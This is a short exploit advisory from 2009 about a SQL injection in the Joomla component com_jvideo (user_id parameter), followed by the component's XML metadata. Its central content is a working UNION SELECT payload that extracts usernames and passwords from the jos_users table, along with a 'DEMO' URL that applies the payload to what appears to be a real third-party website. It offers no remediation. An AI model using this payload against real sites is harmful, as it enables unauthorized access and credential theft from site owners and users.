joomlajvideo-sql.txt
Posted on 30 May 2009
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Joomla Component com_jvideo (user_id) SQL-injection Vulnerability ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ################################################### [+] Author : Chip D3 Bi0s [+] Greetz : d4n!ux + x_jeshua + eCORE + Painboy + rayok3nt + 3l3cTron1k_0 [+] Vulnerability : SQL injection [+] Google Dork : imagine ;) -------------------------------------------------- author : Russell... author Email : chipdebios[alt+64]gmail.com ################################################### Example: http://localHost/path/index.php?option=com_jvideo&view=user&user_id=62[SQL code] SQL code: +and+1=2+union+select+concat(username,0x3a,password)+from+jos_users DEMO: http://www.mosessite.com/index.php?option=com_jvideo&view=user&user_id=62+and%201=2+union+select+concat(username,0x3a,password)+from+jos_users etc, etc.... +++++++++++++++++++++++++++++++++++++++ #[!] Produced in South America +++++++++++++++++++++++++++++++++++++++ <name>JVideo!</name> <creationDate>September 2008</creationDate> <author>Infinovision.com</author> <authorEmail>team@infinovision.com</authorEmail> <authorUrl>http://www.infinovision.com</authorUrl> <copyright>Copyright 2008 Infinovision.com</copyright> <license>http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL</license> <version>0.3.11c Beta</version> <description>JVideo! Component</description>
